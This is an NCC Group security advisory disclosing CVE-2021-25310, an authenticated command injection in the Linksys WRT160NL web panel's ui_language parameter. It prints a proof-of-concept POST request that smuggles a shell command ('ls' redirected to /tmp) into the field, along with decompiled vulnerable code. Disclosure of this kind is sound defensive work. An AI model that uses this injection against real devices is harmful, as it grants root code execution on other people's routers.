Current Vendor: Belkin (Linksys) Vendor URL: https://www.linksys.com/sg/p/P-WRT160NL/ Versions affected: 1.0.04 build 2 (FW_WRT160NL_1.0.04.002_US_20130619_code.bin) Systems Affected: Linksys WRT160NL Authors: Manuel Ginés - Manuel.Gines[at]nccgroup[dot]com && Diego Gómez Marañón – Diego.GomezMaranon[at]nccgroup[dot]com CVE Identifier: CVE-2021-25310 Risk: 8.8 (High) - AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Summary
The Linksys WRT160NL is a switch device initially owned by Cisco and, after the sale of its respective technology branch, by Belkin. In the latest version of the official firmware, the web server binary contained a buffer overflow vulnerability that could be remotely triggered by requesting an authenticated endpoint.
Impact
Successful exploitation of this vulnerability can lead to remote code execution on the affected device.
Details
The administration web panel allows users to change the UI language sending a POST request to the apply.cgi endpoint. That parameter is being used internally as part of a filesystem path in a OS command. The lack of output encoding and input validation allowed authenticated attackers to inject OS commands that will be executed with root privileges.
The following request was used to execute a directory listing and redirect the output to a file in tmp directory:
POST /apply.cgi;session_id=8e780f3bcc71e19a37cc3e60a5576241 HTTP/1.1 Host: 192.168.1.150 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 854 Origin: http://192.168.1.150 Connection: close Referer: http://192.168.1.150/index.asp;session_id=8e780f3bcc71e19a37cc3e60a5576241 Upgrade-Insecure-Requests: 1 pptp_dhcp=0&(...)&ui_language=es||ls>/tmp/b||&(...)
The affected function was found to be do_upgrade_post from mini_httpd binary, and its decompiled code can be checked below.
void do_upgrade_post(char *param_1,undefined4 param_2,int param_3){ (…snip…) puVar7 = (undefined1 *)nvram_get("ui_language"); local_30 = 0; if (puVar7 == (undefined1 *)0x0){ puVar7 = &DAT_00484b64; } snprintf(acStack112,0x40,"cp /www/%s_lang_pack/captmp.js /tmp/.",puVar7); system(acStack112); (…snip…) }
Recommendation
Due to the fact that the product is no longer supported, the best option is to update its firmware with an open-source alternative like OpenWRT.
Vendor Communication
- 22 Jan 2021 – NCC Group contacted Belkin to make them aware of the found vulnerability.
- 22 Jan 2021 – Response from Belkin explaining that the device is not actively supported.
- 28 Jan 2021 – Advisory published.
About NCC Group
NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.
Published date: 28/01/2021
Written by: Manuel Ginés Rodríguez && Diego Gómez Marañón
Published